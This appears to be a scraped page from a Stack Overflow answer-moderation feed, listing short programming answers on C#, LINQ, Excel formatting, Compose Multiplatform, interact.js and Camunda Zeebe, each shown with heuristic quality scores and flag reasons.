I'm sure that you have moved on by now (15 years later), but for future references, today it can be done like this:

// Not using TryGetValue
var theString = dict[key] as string;
    
// Using trygetValue
if(dict.TryGetValue(key, out obj) && obj is string theString) 
{
}
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: DanielMuhlig

79358232

Date: 2025-01-15 12:41:11
Score: 1
Natty:
Report link

Try setting the Format code to 0;0;0;.

Example

Reasons:
  • Probably link only (1):
  • Low length (2):
  • Has code block (-0.5):
  • Single line (0.5):
  • High reputation (-2):
Posted by: Sam Nseir

79358231

Date: 2025-01-15 12:40:09
Score: 10.5 🚩
Natty: 6.5
Report link

I have a Same Issue for convert PVD File to wav format. Please tell me. Your problem is solved?

Oaisys Application have a Oaisys.Waveform.dll file for convert PVD to wav file. Can you use this dll for convert or Other Way to Convert Files?

Reasons:
  • RegEx Blacklisted phrase (2.5): Please tell me
  • RegEx Blacklisted phrase (1.5): solved?
  • Low length (0.5):
  • No code block (0.5):
  • Me too answer (2.5): I have a Same Issue
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: mohammad javadi

79358223

Date: 2025-01-15 12:38:09
Score: 2.5
Natty:
Report link

works perfect for me

List ticketIds = new(); var uniqueTicketIds = ticketIds.Select(x => x).Distinct().ToList();

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: stefan

79358215

Date: 2025-01-15 12:34:08
Score: 0.5
Natty:
Report link

Since Compose Multiplatform 1.7.3, The resources are getting packed as Android assets already,

Therefore Typeface.createFromFile(File(Res.getUri('font/path/in/multiplat/commons/'))) should work.

Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • High reputation (-1):
Posted by: Nima

79358214

Date: 2025-01-15 12:34:07
Score: 5
Natty:
Report link

Thank you! That did exactly what I needed.

Reasons:
  • Blacklisted phrase (0.5): Thank you
  • Blacklisted phrase (0.5): I need
  • Low length (1.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Sean Kilgo

79358212

Date: 2025-01-15 12:34:07
Score: 1
Natty:
Report link

I removed draggable="true" from all elements and now it is working. This change allows interact.js to control dragging instead of the browser's built-in drag-and-drop feature. I also checked the interact.js sample code and i didn't see the draggable="true" attribute used on any of the elements.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Shahnawaz

79358208

Date: 2025-01-15 12:33:07
Score: 1.5
Natty:
Report link

Your first approach looks decent but may be improved. Rendering a UI for a corresponding user task is the way to go.

However, "completing" a UserTask via a Message Event is unnecessarily complex. Never Versions of the ZeeBeeClient allow the completion of UserTasks directly. See https://javadoc.io/doc/io.camunda/zeebe-client-java/8.6.6/io/camunda/zeebe/client/ZeebeClient.html#newUserTaskCompleteCommand(long)

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: BFR

79358204

Date: 2025-01-15 12:31:07
Score: 3.5
Natty:
Report link

dom.getDocument is what needs to be called. Looks like DOM.enable doesn't enable all events.

More info- https://stackoverflow.com/a/79358124/27979385

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: SS221